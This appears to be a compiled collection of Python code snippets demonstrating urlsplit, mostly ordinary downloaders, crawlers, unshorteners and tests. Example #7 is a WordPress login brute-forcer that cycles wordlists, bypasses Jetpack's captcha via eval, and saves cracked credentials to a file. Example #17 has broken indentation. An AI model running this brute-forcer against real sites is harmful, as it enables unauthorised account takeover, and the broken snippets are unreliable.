Example #1
def normalize_url(url, base_url=None):
    """
    Returns a normalized URL. If the URL scheme is missing, the 'file' scheme is set.

    :param url: A relative or absolute URL.
    :param base_url: A reference base URL to join with.
    :return: A normalized URL.
    """
    url_parts = urlsplit(url)
    if url_parts.scheme and url_parts.scheme in uses_relative:
        return url_parts.geturl()
    elif base_url is None:
        pathname = os.path.abspath(url_parts.geturl())
        return urljoin(u'file:', pathname2url(pathname))
    else:
        base_url_parts = urlsplit(base_url)
        if base_url_parts.scheme and base_url_parts.scheme in uses_relative:
            return urlunsplit((base_url_parts.scheme, base_url_parts.netloc,
                               os.path.join(base_url_parts.path,
                                            pathname2url(url)),
                               base_url_parts.query, base_url_parts.fragment))
        else:
            pathname = os.path.abspath(os.path.join(base_url, url))
            url_parts = urlsplit(pathname2url(pathname))
            if url_parts.scheme and url_parts.scheme in uses_relative:
                return url_parts.geturl()
            else:
                return urljoin(u'file:', url_parts.geturl())
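
A minimal usage sketch for normalize_url above, assuming the imports the snippet relies on (urlsplit, urljoin, urlunsplit and uses_relative from urllib.parse, pathname2url from urllib.request, plus os); outputs shown for a POSIX system:

print(normalize_url('https://example.com/schema.xsd'))
# -> 'https://example.com/schema.xsd' (absolute URL with a known scheme, returned as-is)
print(normalize_url('types.xsd', base_url='https://example.com/schemas/'))
# -> 'https://example.com/schemas/types.xsd'
print(normalize_url('types.xsd'))
# -> 'file://' + absolute path of 'types.xsd' under the current working directory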
Example #2
def print_some_url(url, return_string=True):
    message = f"hello{pathsep*2}human"
    loc = req.urlsplit(url).netloc
    output = f"{message}, welcome to {loc}"
    print(output)
    if return_string:
        return output
Example #3
def load_resource(url):
    """
    Load a resource from a URL, decoding it to a unicode string (UTF-8, with an
    ISO-8859-1 fallback).

    :param url: Resource URL.
    :return: Resource as a unicode string and the loaded URL.
    """
    msg = "cannot load resource from %r: %s"
    try:
        source = urlopen(normalize_url(url))
    except URLError as err:
        raise XMLSchemaURLError(reason=msg % (url, err.reason))
    else:
        try:
            data = source.read()
        except (OSError, IOError) as err:
            raise XMLSchemaOSError(msg % (url, err))
        finally:
            source.close()

    if PY3:
        try:
            return data.decode('utf-8'), url
        except UnicodeDecodeError:
            return data.decode('iso-8859-1'), url
    else:
        try:
            return data.encode('utf-8'), url
        except UnicodeDecodeError:
            import codecs
            with codecs.open(urlsplit(url).path,
                             mode='rb',
                             encoding='iso-8859-1') as text_file:
                return text_file.read().encode('iso-8859-1'), url
Example #4
 def wait(self, url):
     domain = urlsplit(url).netloc
     last_accessed = self.domains.get(domain)
     if self.delay > 0 and last_accessed is not None:
         sleep_secs = self.delay - (datetime.now() - last_accessed).seconds
         if sleep_secs > 0:
             time.sleep(sleep_secs)
     self.domains[domain] = datetime.now()
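
The wait method above is only a class fragment; here is a minimal self-contained sketch of the per-domain crawler throttle it presumably belongs to (the class name Throttle and its constructor are assumptions):

import time
from datetime import datetime
from urllib.parse import urlsplit

class Throttle:  # hypothetical enclosing class
    """Pause between successive requests to the same domain."""

    def __init__(self, delay):
        self.delay = delay  # minimum seconds between hits on one domain
        self.domains = {}   # domain -> datetime of the last access

    def wait(self, url):
        domain = urlsplit(url).netloc
        last_accessed = self.domains.get(domain)
        if self.delay > 0 and last_accessed is not None:
            sleep_secs = self.delay - (datetime.now() - last_accessed).seconds
            if sleep_secs > 0:
                time.sleep(sleep_secs)
        self.domains[domain] = datetime.now()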
Example #5
def query_splitter(url):
	from attrdict import AttrDict
	from collections import OrderedDict
	from operator import attrgetter, itemgetter
	from urllib.parse import urlsplit, urlparse
	query = attrgetter('query')(urlsplit(url))
	dic = urlparse(url)._asdict()
	_query = itemgetter('query')(dic)
	print(OrderedDict([q.split('=') for q in _query.split('&')])['text'])
	return AttrDict(OrderedDict([q.split('=') for q in query.split('&')]))
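
A hedged usage example for query_splitter (the URL is illustrative; attrdict is an unmaintained third-party package, so this sketch assumes it is installed):

params = query_splitter('https://example.com/search?text=hello&lang=en')
# prints 'hello' (the value of the 'text' parameter)
print(params.lang)  # -> 'en', attribute-style access via AttrDict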
Example #6
    def url_to_path(self, url):
        components = urlsplit(url)
        path = components.path
        # the path may be empty for a bare domain URL (e.g. nothing after '.com/')
        if not path:
            path = '/index.html'
        elif path.endswith('/'):
            path += 'index.html'

        filename = components.netloc + path + components.query
        # the filename may contain characters the filesystem does not support
        # (e.g. '*' or '>'), so replace them
        filename = re.sub(r'[^0-9a-zA-Z\-.,;_]', '_', filename)
        return os.path.join(self.cache_dir, filename)
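
For experimenting outside the class, a hedged standalone variant with the same URL-to-filename mapping (the 'cache' default directory is an assumption):

import os
import re
from urllib.parse import urlsplit

def url_to_path(url, cache_dir='cache'):
    components = urlsplit(url)
    path = components.path or '/index.html'  # bare domain -> index.html
    if path.endswith('/'):
        path += 'index.html'
    filename = components.netloc + path + components.query
    filename = re.sub(r'[^0-9a-zA-Z\-.,;_]', '_', filename)  # strip unsafe chars
    return os.path.join(cache_dir, filename)

print(url_to_path('http://example.com/a/b/'))  # -> 'cache/example.com_a_b_index.html' on POSIX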
Example #7
 def crack(self):
     print('%s\t[info]%s total site: %d' % (h, p, len(self.site)))
     print('%s\t[info]%s total wordlist u/p: %d' %
           (h, p, min([len(self.a), len(self.b)])))
     for site in self.site:
         requests.headers.update({'user-agent': random.choice(ua)})
         parse = urlsplit(site)
         netloc = parse.netloc
         scheme = parse.scheme
         print('%s[info]%s cracking: %s' % (br, p, netloc))
         for a, b in zip(self.a, self.b):
             try:
                 data = {}
                 url = '%s://%s/wp-login.php' % (scheme, netloc)
                 cek = requests.get(url)
                 if cek.status_code != 200:
                     print('%s[info]%s path wp-login not found ' % (m, p))
                     continue
                 for c, d in re.findall(r'name="(.*?)".*?value="(.*?)"',
                                        cek.text):
                     data.update({c: d})
                 if 'jetpack_protect_num' in cek.text.lower():
                     info = re.findall(r'\n\t\t\t\t\t(.*?)=.*?\t\t\t\t',
                                       cek.text)[0].split(' ')
                     iok = (''.join(info)).replace('x', '*').replace(
                         ' ', '')
                     value = str(eval(iok))
                     print('%s[info]%s user flagged as suspicious!!!' % (m, p))
                     print('%s[info]%s bypass captcha %s = %s%s' %
                           (m, p, iok, h, value))
                     data.update({'jetpack_protect_num': value})
                 else:
                     pass
                 data.update({'log': a, 'pwd': b})
                 req = requests.post(url, data=data).text.lower()
                 if 'dashboard' in req:
                     self.v += 1
                     print('    %s[Success] %s: %s > %s , %s' %
                           (h, p, url, a, b))
                     open('found.txt',
                          'a').write(url + '>  %s | %s \n' % (a, b))
                     break
                 else:
                     print('    %s[Failed] %s%s , %s' % (m, p, a, b))
                 continue
             except Exception:
                 print('%s[info] %serror ..' % (m, p))
                 continue
     quit('%s[%s@%s]%s finished, total %s saved to found.txt' %
          (br, m, br, p, self.v))
Example #8
def download(url, path="./"):
    # Create the download dir if it does not exist
    if not os.path.isdir(path):
        os.makedirs(path)

    # Download the file from `url` and save it locally under `file_name`:
    split = urlsplit(url)
    file_name = split.path.split("/")[-1]
    path = os.path.join(path, file_name)
    if not os.path.isfile(path):
        file_name, headers = urlretrieve(url, path, reporthook=reporthook)
    print("\nDownload complete!")
    return path
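
A hedged usage example (urlretrieve and urlsplit come from urllib, and the snippet assumes a reporthook(count, block_size, total_size) progress callback exists in the enclosing module; the URL is illustrative):

saved = download('https://example.com/data/archive.zip', path='./downloads/')
print(saved)  # -> './downloads/archive.zip'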
Example #9
def down_parse_html(url):
    """
    download html and parse it with lxml.html
    :param url: string
    :return: lxml html parsed document
    """
    request = urlopen(Request(url, headers={'User-Agent':
                                                'Mozilla/5.0 (Windows NT 5.1; rv:10.0.1) '
                                                'Gecko/20100101 Firefox/10.0.1'}))
    encoding = request.headers.get_content_charset()
    data = request.read().decode(encoding if encoding else 'utf-8')
    doc = html.fromstring(data)
    doc.make_links_absolute('{0.scheme}://{0.netloc}'.format(urlsplit(url)))
    return doc
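
A hedged usage example (performs a live request and requires lxml; the URL is illustrative):

doc = down_parse_html('https://example.com/')
for href in doc.xpath('//a/@href'):
    print(href)  # links are already absolute thanks to make_links_absolute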
Example #10
    def __download_file(self, name, libname, url, download_path):
        # try to detect already downloaded file
        (version,
         exists) = self.__detect_existing_download(libname, download_path)

        if not exists:
            # download new local version
            try:
                # urlgrabber follows redirects better than using urllib directly
                local_file = urlgrabber.urlopen(
                    url)  # use urlgrabber to open the url
                actual_url = local_file.url  # the actual url after redirects
                values = urlsplit(actual_url)  # split the url up into bits
                filepath = Path(
                    values[2])  # index 2 is the path section of the url
                filename = filepath.name  # just extract the file name.

            except urlgrabber.grabber.URLGrabError as error:
                self.print_message(str(error))
                return  # nothing was opened, so there is nothing to download

            self.print_message(
                _('Started downloading {}').format(filename))
            download_file = download_path / filename
            extract_path = self.download_path / name
            extract_path.mkdir(parents=True, exist_ok=True)
            self.__download_remote_file(local_file, download_file)
            self.__decompress(filename, download_file, download_path,
                              extract_path)
            self.print_message(_('Completed download of {}.').format(filename))
        else:
            # check the existing local version against the download version
            filename = Path(urlsplit(url).path).name  # name taken from the request url
            (f_major, f_minor,
             f_build) = self.__detect_library_version(version)
            (d_major, d_minor,
             d_build) = self.__detect_download_version(filename)
            if (d_major, d_minor, d_build) > (f_major, f_minor, f_build):
                # download replacement if newer
                self.print_message(
                    _('Started downloading {} to replace earlier version').
                    format(filename))
                download_file = download_path / filename
                extract_path = self.download_path / name
                extract_path.mkdir(parents=True, exist_ok=True)
                local_file = urlgrabber.urlopen(url)  # open the url for download
                self.__download_remote_file(local_file, download_file)
                self.__decompress(filename, download_file, download_path,
                                  extract_path)
                self.print_message(
                    _('Completed download of {} replacement version.').
                    format(filename))
Example #11
    def unshorten(self, uri, type=None, timeout=10):
        domain = urlsplit(uri).netloc
        self._timeout = timeout

        if not domain:
            return uri, INVALID_URL_ERROR_CODE

        if re.search(self._adfly_regex, domain, re.IGNORECASE) or type == 'adfly':
            return self._unshorten_adfly(uri)
        if re.search(self._adfocus_regex, domain, re.IGNORECASE) or type =='adfocus':
            return self._unshorten_adfocus(uri)
        if re.search(self._linkbucks_regex, domain, re.IGNORECASE) or type == 'linkbucks':
            if linkbucks_support:
                return self._unshorten_linkbucks(uri)
            else:
                return uri, 'linkbucks.com not supported. Install selenium package to add support.'
        if re.search(self._lnxlu_regex, domain, re.IGNORECASE) or type == 'lnxlu':
            return self._unshorten_lnxlu(uri)
        if re.search(self._shst_regex, domain, re.IGNORECASE):
            return self._unshorten_shst(uri)
        if re.search(self._hrefli_regex, domain, re.IGNORECASE):
            return self._unshorten_hrefli(uri)
        if re.search(self._anonymz_regex, domain, re.IGNORECASE):
            return self._unshorten_anonymz(uri)

        try:
            # headers stop t.co from working so omit headers if this is a t.co link
            if domain == 't.co':
                r = requests.get(uri, timeout=self._timeout)
                return r.url, r.status_code
            # p.ost.im uses meta http refresh to redirect.
            if domain == 'p.ost.im':
                r = requests.get(uri, headers=self._headers, timeout=self._timeout)
                uri = re.findall(r'.*url\=(.*?)\"\.*',r.text)[0]
                return uri, 200
            try:
                r = requests.head(uri, headers=self._headers, timeout=self._timeout)
            except (requests.exceptions.InvalidSchema, requests.exceptions.InvalidURL):
                return uri, -1
            else:
                while True:
                    if 'location' in r.headers:
                        r = requests.head(r.headers['location'])
                        uri = r.url
                    else:
                        return r.url, r.status_code

        except Exception as e:
            return uri, str(e)
Example #12
    def unshorten(self, uri, type=None, timeout=10):
        domain = urlsplit(uri).netloc
        self._timeout = timeout

        if re.search(self._adfly_regex, domain,
                     re.IGNORECASE) or type == 'adfly':
            return self._unshorten_adfly(uri)
        if re.search(self._adfocus_regex, domain,
                     re.IGNORECASE) or type == 'adfocus':
            return self._unshorten_adfocus(uri)
        if re.search(self._linkbucks_regex, domain,
                     re.IGNORECASE) or type == 'linkbucks':
            if linkbucks_support:
                return self._unshorten_linkbucks(uri)
            else:
                return uri, 'linkbucks.com not supported. Install selenium package to add support.'
        if re.search(self._lnxlu_regex, domain,
                     re.IGNORECASE) or type == 'lnxlu':
            return self._unshorten_lnxlu(uri)
        if re.search(self._shst_regex, domain, re.IGNORECASE):
            return self._unshorten_shst(uri)

        try:
            # headers stop t.co from working so omit headers if this is a t.co link
            if domain == 't.co':
                r = requests.get(uri, timeout=self._timeout)
                return r.url, r.status_code
            # p.ost.im uses meta http refresh to redirect.
            if domain == 'p.ost.im':
                r = requests.get(uri,
                                 headers=self._headers,
                                 timeout=self._timeout)
                uri = re.findall(r'.*url\=(.*?)\"\.*', r.text)[0]
                return uri, 200
            r = requests.head(uri,
                              headers=self._headers,
                              timeout=self._timeout)
            while True:
                if 'location' in r.headers:
                    r = requests.head(r.headers['location'])
                    uri = r.url
                else:
                    return r.url, r.status_code

        except Exception as e:
            return uri, str(e)
Example #13
    def __init__(self, base, auth=None):
        self.auth = auth
        self.headers = {'User-Agent': 'foobar'}
        self.context = init_ssl()
        self.jar = CookieJar()
        split = urlsplit(base)
        self.base = '{}://{}'.format(split.scheme, split.netloc)

        if self.auth:
            auth = ':'.join(self.auth)
            if sys.version_info >= (3,):
                basic = base64.b64encode(auth.encode('ascii')).decode('ascii')
            else:
                basic = base64.b64encode(auth)
            self.headers['Authorization'] = 'Basic {}'.format(basic)

        self._get_crumb()
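
A quick check of the Basic auth header construction used above (standard base64 of 'user:password'; the credentials are made up):

import base64

basic = base64.b64encode('user:secret'.encode('ascii')).decode('ascii')
print('Basic {}'.format(basic))  # -> 'Basic dXNlcjpzZWNyZXQ='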
Example #14
 def connect(url: str) -> tuple:
     """
     Connect to the given url and extract the html.

     :param url:
     """
     year = urlsplit(url).netloc.split('.')[0]
     try:
         headers = dict()
         headers["User-Agent"] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 " \
                                 "(KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
         req = urllib.request.Request(url, headers=headers)
         with urllib.request.urlopen(req) as response:
             page = codecs.decode(response.read())
         return page, int(year)
     except urllib.request.URLError as e:
         print(f"The following error had raise while trying to connect to {url}\n")
         print(e)
         sys.exit()
Example #15
def isNeededUrl(url):
    neededUrl = True
    fileName = urlsplit(url).path.lower().split("/")[-1]
    if fileName in comm.undesiredFileName:
        neededUrl = False
    if neededUrl:
        extSplit = fileName.split(".")
        lastIndex = len(extSplit) - 1
        if lastIndex > 0:
            extension = extSplit[lastIndex]
            if extension in comm.undesiredFileExtensions:
                neededUrl = False
    if neededUrl:
        for udft in comm.undesiredFileTypes:
            if udft in url:
                neededUrl = False
                break
    return neededUrl
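
A hedged usage sketch for isNeededUrl; the comm module holds the filter collections and is stubbed out here for illustration:

class comm:  # stand-in for the snippet's comm module
    undesiredFileName = {'favicon.ico'}
    undesiredFileExtensions = {'png', 'jpg'}
    undesiredFileTypes = {'mailto:'}

print(isNeededUrl('https://example.com/favicon.ico'))  # -> False (blocked filename)
print(isNeededUrl('https://example.com/page.html'))    # -> True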
Example #16
def checkcrolling(url):
    urlspli = request.urlsplit(url)
    netloc = urlspli.netloc
    path = urlspli.path
    robots = urlspli.scheme + "://" + netloc + "/robots.txt"
    response = request.urlopen(robots)
    wrapper = io.TextIOWrapper(response, 'utf-8')
    read = wrapper.read()
    if read.startswith("User-agent"):
        disallowlist = [
            string[string.index(":") + 1::].strip(" ")
            for string in read.split("\n") if string.startswith("Disallow")
        ]
        disallowlist.append("/")
        if "/" in disallowlist:
            return False
        return path in disallowlist
    else:
        return False
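
A hedged usage sketch (fetches the target's live robots.txt; True means the exact path is listed as disallowed while the root itself is not):

print(checkcrolling('http://www.daum.net/somepath'))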
Example #17
	def redirected(self, req, fp, code, msg, headers):
		note.yellow("being redirected",code,msg,headers.get("location"))
		note(headers)
		if 'set-cookie' in headers:
			import time
			parts = headers['set-cookie'].split(";")
			n,v = parts[0].split("=",1)
			url = urllib.urlsplit(req.url)
			c = {
				'name': n.strip(),
				'value': v.strip(),
				'domain': split_port(url.netloc)[1],
				'creationTime': time.time()
			}
			for part in parts[1:]:
				part = part.split("=",1)
				if len(part) == 1:
				c[part[0].strip()] = True
				else:
					c[part[0].strip()] = part[1].strip()
			jar.set_cookie(c)
Example #19
def url2name(url):
    return basename(urlsplit(url)[2])
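
For reference, index 2 of a SplitResult is the path component, so this returns the last path segment (basename comes from os.path, urlsplit from urllib.parse):

print(url2name('https://example.com/files/report.pdf'))  # -> 'report.pdf'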
Example #20
import os
from argparse import ArgumentParser
from struct import pack
from urllib.parse import urlsplit
from urllib.request import urlopen

from tqdm import tqdm

import aigym.dataset
from aigym.conf.settings import RAW_DATASETS_DIR

arg_parser = ArgumentParser('aigym.dataset')
arg_parser.add_argument('-download',
                        metavar='url',
                        help="download dataset file from url")
arg_parser.add_argument('-prepare',
                        metavar='dataset name',
                        help="prepares dataset specified by name")

parsed_args = arg_parser.parse_args()

if parsed_args.download:
    source = urlopen(parsed_args.download)
    filename = os.path.split(urlsplit(parsed_args.download).path)[-1]
    with open(os.path.join(RAW_DATASETS_DIR, filename), 'wb') as file:
        for byte in tqdm(source.read(),
                         desc='Downloading from {}'.format(
                             parsed_args.download)):
            file.write(pack('B', byte))

if parsed_args.prepare:
    cls = getattr(aigym.dataset,
                  "{}RawDataset".format(parsed_args.prepare.title()), None)
    if cls is not None:
        cls().prepare()
Example #21
 def basename(self) -> str:
     return Path(request.urlsplit(self._url)[2]).name
Example #22
>>> import urllib2
Traceback (most recent call last):
  File "<pyshell#10>", line 1, in <module>
    import urllib2
ModuleNotFoundError: No module named 'urllib2'
>>> import urllib.request as request
>>> dir(request)
['AbstractBasicAuthHandler', 'AbstractDigestAuthHandler', 'AbstractHTTPHandler', 'BaseHandler', 'CacheFTPHandler', 'ContentTooShortError', 'DataHandler', 'FTPHandler', 'FancyURLopener', 'FileHandler', 'HTTPBasicAuthHandler', 'HTTPCookieProcessor', 'HTTPDefaultErrorHandler', 'HTTPDigestAuthHandler', 'HTTPError', 'HTTPErrorProcessor', 'HTTPHandler', 'HTTPPasswordMgr', 'HTTPPasswordMgrWithDefaultRealm', 'HTTPPasswordMgrWithPriorAuth', 'HTTPRedirectHandler', 'HTTPSHandler', 'MAXFTPCACHE', 'OpenerDirector', 'ProxyBasicAuthHandler', 'ProxyDigestAuthHandler', 'ProxyHandler', 'Request', 'URLError', 'URLopener', 'UnknownHandler', '__all__', '__builtins__', '__cached__', '__doc__', '__file__', '__loader__', '__name__', '__package__', '__spec__', '__version__', '_cut_port_re', '_ftperrors', '_have_ssl', '_localhost', '_noheaders', '_opener', '_parse_proxy', '_proxy_bypass_macosx_sysconf', '_randombytes', '_safe_gethostbyname', '_thishost', '_url_tempfiles', 'addclosehook', 'addinfourl', 'base64', 'bisect', 'build_opener', 'contextlib', 'email', 'ftpcache', 'ftperrors', 'ftpwrapper', 'getproxies', 'getproxies_environment', 'getproxies_registry', 'hashlib', 'http', 'install_opener', 'io', 'localhost', 'noheaders', 'os', 'parse_http_list', 'parse_keqv_list', 'pathname2url', 'posixpath', 'proxy_bypass', 'proxy_bypass_environment', 'proxy_bypass_registry', 'quote', 're', 'request_host', 'socket', 'splitattr', 'splithost', 'splitpasswd', 'splitport', 'splitquery', 'splittag', 'splittype', 'splituser', 'splitvalue', 'ssl', 'string', 'sys', 'tempfile', 'thishost', 'time', 'to_bytes', 'unquote', 'unquote_to_bytes', 'unwrap', 'url2pathname', 'urlcleanup', 'urljoin', 'urlopen', 'urlparse', 'urlretrieve', 'urlsplit', 'urlunparse', 'warnings']
>>> dir(urllib.response)
['__all__', '__builtins__', '__cached__', '__doc__', '__file__', '__loader__', '__name__', '__package__', '__spec__', 'addbase', 'addclosehook', 'addinfo', 'addinfourl', 'tempfile']
>>> url = "https://www.google.com"
>>> sp = request.urlsplit()
Traceback (most recent call last):
  File "<pyshell#15>", line 1, in <module>
    sp = request.urlsplit()
TypeError: urlsplit() missing 1 required positional argument: 'url'
>>> sp = request.urlsplit(url)
>>> sp
SplitResult(scheme='https', netloc='www.google.com', path='', query='', fragment='')
>>> sp[0]
'https'
>>> sp[1]
'www.google.com'
>>> sp[2]
''
>>> url1="https://stackoverflow.com/questions/34475051/need-to-install-urllib2-for-python-3-5-1"
>>> sp = request.urlsplit(url1)
Example #23
def test_get_legacy_release_download_url(blender_version, operative_system,
                                         bits, arch):
    blender_Version = BlenderVersion(blender_version)

    if blender_Version < BlenderVersion(MINIMUM_VERSION_SUPPPORTED):
        mocked_stderr = io.StringIO()
        with pytest.raises(SystemExit):
            with contextlib.redirect_stderr(mocked_stderr):
                get_legacy_release_download_url(blender_version,
                                                operative_system, bits, arch)
        assert mocked_stderr.getvalue() == (
            "The minimum version supported by blender-downloader is"
            f" {MINIMUM_VERSION_SUPPPORTED}.\n")
        return

    url = get_legacy_release_download_url(blender_version, operative_system,
                                          bits, arch)

    expected_url_start = "https://download.blender.org/release/Blender"
    assert url.startswith(expected_url_start)

    major_minor_blender_version = re.sub(
        r"[a-zA-Z]", "", ".".join(blender_version.split(".")[:2]))

    def assert_url(url_end_schema):
        url_end = url_end_schema
        if "{blender_version}" in url_end:
            if "{bits}" in url_end:
                url_end = url_end.format(
                    blender_version=blender_version,
                    bits=bits,
                )
            else:
                url_end = url_end.format(blender_version=blender_version)
        if "{bits}" in url_end:
            url_end = url_end.format(bits=bits)
        assert url == (
            f"{expected_url_start}{major_minor_blender_version}/blender-{url_end}"
        )

    if operative_system == "macos":
        if blender_Version >= BlenderVersion("2.93"):
            if arch in ["x64", "arm64"]:
                assert_url(f"{blender_version}-macos-{arch}.dmg")
            else:
                assert_url("{blender_version}-macos-x64.dmg")
        elif blender_Version >= BlenderVersion(
                "2.83.14") and blender_Version < BlenderVersion("2.84"):
            assert_url("{blender_version}-macos-x64.dmg")
        elif blender_Version > BlenderVersion("2.79"):
            assert_url("{blender_version}-macOS.dmg")
        elif blender_Version == BlenderVersion("2.79"):
            assert_url("{blender_version}-macOS-10.6.tar.gz")
        elif blender_Version == BlenderVersion("2.71"):
            if bits == 32:
                assert_url("{blender_version}-OSX_10.6-j2k-fix-i386.zip")
            else:
                assert_url("{blender_version}-OSX_10.6-j2k-fix-x86_64.zip")
        elif blender_Version < BlenderVersion("2.60"):
            if bits == 32:
                assert_url("{blender_version}-OSX_10.5_i386.zip")
            else:
                assert_url("{blender_version}-OSX_10.5_x86_64.zip")
        elif blender_Version == BlenderVersion("2.60"):
            if bits == 32:
                assert_url("{blender_version}-OSX_10.5_i386.zip")
            else:
                assert_url("{blender_version}-OSX_10.6_x86_64.zip")
        elif blender_Version < BlenderVersion("2.64"):
            if bits == 32:
                assert_url("{blender_version}-release-OSX_10.5_i386.zip")
            else:
                assert_url("{blender_version}-release-OSX_10.5_x86_64.zip")
        elif blender_Version < BlenderVersion("2.65"):
            if bits == 32:
                assert_url("{blender_version}-release-OSX_10.6_i386.zip")
            else:
                assert_url("{blender_version}-release-OSX_10.6_x86_64.zip")

        elif blender_Version < BlenderVersion("2.71"):
            if bits == 32:
                assert_url("{blender_version}-OSX_10.6-i386.zip")
            else:
                assert_url("{blender_version}-OSX_10.6-x86_64.zip")
        elif blender_Version < BlenderVersion("2.79"):
            assert_url("{blender_version}-OSX_10.6-x86_64.zip")
        else:  # BlenderVersion("2.71") < blender_Version < BlenderVersion("2.79")
            if bits == 32:
                assert_url("{blender_version}-OSX_10.6-i386.zip")
            else:
                assert_url("{blender_version}-OSX_10.6-x86_64.zip")
    elif operative_system == "windows":
        if blender_Version >= BlenderVersion("2.93"):
            assert_url("{blender_version}-windows-x64.zip")
        elif blender_Version >= BlenderVersion(
                "2.83.14") and blender_Version < BlenderVersion("2.84"):
            assert_url("{blender_version}-windows-x64.zip")
        elif blender_Version > BlenderVersion("2.80"):
            assert_url("{blender_version}-windows64.zip")
        elif blender_Version > BlenderVersion("2.65"):
            assert_url("{blender_version}-windows{bits}.zip")
        elif blender_Version > BlenderVersion("2.60"):
            assert_url("{blender_version}-release-windows{bits}.zip")
        else:  # blender_Version < BlenderVersion("2.61")
            assert_url("{blender_version}-windows{bits}.zip")
    else:  # operative_system == "linux":
        if blender_Version >= BlenderVersion("2.93"):
            assert_url("{blender_version}-linux-x64.tar.xz")
        elif blender_Version >= BlenderVersion(
                "2.83.14") and blender_Version < BlenderVersion("2.84"):
            assert_url("{blender_version}-linux-x64.tar.xz")
        elif blender_Version > BlenderVersion("2.81"):
            assert_url("{blender_version}-linux64.tar.xz")
        elif blender_Version == BlenderVersion("2.81"):
            assert_url("{blender_version}-linux-glibc217-x86_64.tar.bz2")
        elif blender_Version == BlenderVersion("2.80"):
            if bits == 32:
                assert_url("{blender_version}-linux-glibc224-i686.tar.bz2")
            else:
                assert_url("{blender_version}-linux-glibc217-x86_64.tar.bz2")
        elif blender_Version == BlenderVersion("2.79"):
            if bits == 32:
                assert_url("{blender_version}-linux-glibc219-i686.tar.bz2")
            else:
                assert_url("{blender_version}-linux-glibc219-x86_64.tar.bz2")
        elif blender_Version < BlenderVersion("2.65"):
            if bits == 32:
                assert_url("{blender_version}-linux-glibc27-i686.tar.bz2")
            else:
                assert_url("{blender_version}-linux-glibc27-x86_64.tar.bz2")
        else:  # BlenderVersion("2.64") < blender_Version < BlenderVersion("2.79")
            if bits == 32:
                assert_url("{blender_version}-linux-glibc211-i686.tar.bz2")
            else:
                assert_url("{blender_version}-linux-glibc211-x86_64.tar.bz2")

    # check that filetype is supported for extraction
    extension = os.path.splitext(os.path.basename(urlsplit(url).path))[1]
    assert extension in SUPPORTED_EXTENSIONS_FOR_EXTRACTION
Example #24
            return True
        if self.index > other.index:
            return True
        return False

    def __eq__(self, other):
        if self.index == other.index:
            return True


file_info_list = []
input_json = input()
parsed_json = json.loads(input_json)
i = 0

for element in parsed_json:
    url = element["url"]
    split_result = request.urlsplit(url)
    file_name = split_result[2]
    if file_name == "/":
        file_name = "index.html"
    file_info_list.append(FileInfo(url, file_name, i))
    i += 1

file_info_list.sort()
password = ""
for file_info in file_info_list:
    password += file_info.md5

print(password)
Example #25
import requests
from bs4 import BeautifulSoup
from urllib.request import urlsplit

general = 'https://afteegypt.org/blocked-websites-list?lang=en'
afteegypt = requests.get(general)
parse = BeautifulSoup(afteegypt.content, "html5lib")

blocked_websites = []

for table in parse.find_all('table'):

    for tr in table.findAll('tr', attrs={'style': 'height: 26px;'}):
        for anchor in tr.findAll('a'):
            url = urlsplit(anchor.get('href')).netloc
            blocked_websites.append(url)

    # Second half of the tables
    for td1 in table.findAll(
            'td',
            attrs=
        {
            'style':
            'background-color: #faf2f2; text-align: center; height: 26px; width: 214px;',
            'colspan': '2'
        }):
        v = td1.renderContents()
        for x in str(v.decode('utf-8')).replace('<br/>', '').split():
            blocked_websites.append(x)

    # First half of the tables
Example #27
 def normalize(uri):
     return urlsplit(uri).geturl()
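
geturl() on a SplitResult re-serializes the parsed pieces, which applies urlsplit's mild normalization; for example, the scheme is lowercased while the rest is preserved:

from urllib.parse import urlsplit

print(urlsplit('HTTP://example.com/a?b=1#frag').geturl())
# -> 'http://example.com/a?b=1#frag'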
Example #28
def download_release(download_url, output_directory, quiet=False):
    """Downloads the release file from Blender official repository.

    Parameters
    ----------

    download_url : str
      URL of the file to download.

    output_directory : str
      Path to the directory in which the downloaded file will be stored.

    quiet : bool, optional
      Disable progress bar output.
    """
    try:
        # get filename of downloaded file (maybe a zip, maybe a dmg...)
        output_filename = os.path.basename(urlsplit(download_url).path)
        output_filepath = os.path.join(output_directory, output_filename)

        if os.path.isfile(output_filepath):
            sys.stderr.write(
                f"There is already a file named as '{output_filename}' in the"
                " directory in which Blender will be downloaded.\nPlease, remove"
                " the file before execute blender-downloader.\n")
            sys.exit(1)

        # create the temporary blender-downloader directory, if it does not
        # exist, to store the file while it downloads
        if not os.path.isdir(TEMPDIR):
            os.mkdir(TEMPDIR)

        tmp_output_filepath = os.path.join(TEMPDIR, output_filename)

        chunksize = 8192
        downloaded_size = chunksize
        res = urlopen(Request(download_url))
        total_size_bytes = int(res.info()["Content-Length"])

        progress_bar_kwargs = dict(
            total=total_size_bytes,
            unit="B",
            desc=f"Downloading '{output_filename}'",
            unit_scale=True,
            unit_divisor=1000,
            miniters=1,
            disable=quiet,
            initial=chunksize,  # first chunk is written before entering while
        )
        with tqdm(**progress_bar_kwargs) as progress_bar, open(
                tmp_output_filepath, "wb") as f:
            data = res.read(chunksize)
            f.write(data)
            while data:
                data = res.read(chunksize)
                f.write(data)
                progress_bar.update(chunksize)
                downloaded_size += chunksize
                if downloaded_size >= total_size_bytes:
                    break
    except KeyboardInterrupt:
        sys.stderr.write("Download interrupted\n")
        if os.path.isfile(tmp_output_filepath):
            os.remove(tmp_output_filepath)
        sys.exit(1)

    # move from the temporary directory to the real output path
    os.rename(tmp_output_filepath, output_filepath)

    return output_filepath
Example #29
from urllib import request
import io

url = "http://www.daum.net/robots.txt"
response = request.urlopen(url)
string = request.urlsplit(url)
print(response)
aa = io.TextIOWrapper(response, 'utf-8')
bb = aa.read()
print(bb.startswith("User-agent"))
disallow_list = [
    string[string.index(":") + 1::].strip(" ") for string in bb.split("\n")
    if string.startswith("Disallow")
]

print(disallow_list)


def checkcrolling(url):
    urlspli = request.urlsplit(url)
    netloc = urlspli.netloc
    path = urlspli.path
    robots = urlspli.scheme + "://" + netloc + "/robots.txt"
    response = request.urlopen(robots)
    wrapper = io.TextIOWrapper(response, 'utf-8')
    read = wrapper.read()
    if read.startswith("User-agent"):
        disallowlist = [
            string[string.index(":") + 1::].strip(" ")
            for string in read.split("\n") if string.startswith("Disallow")
        ]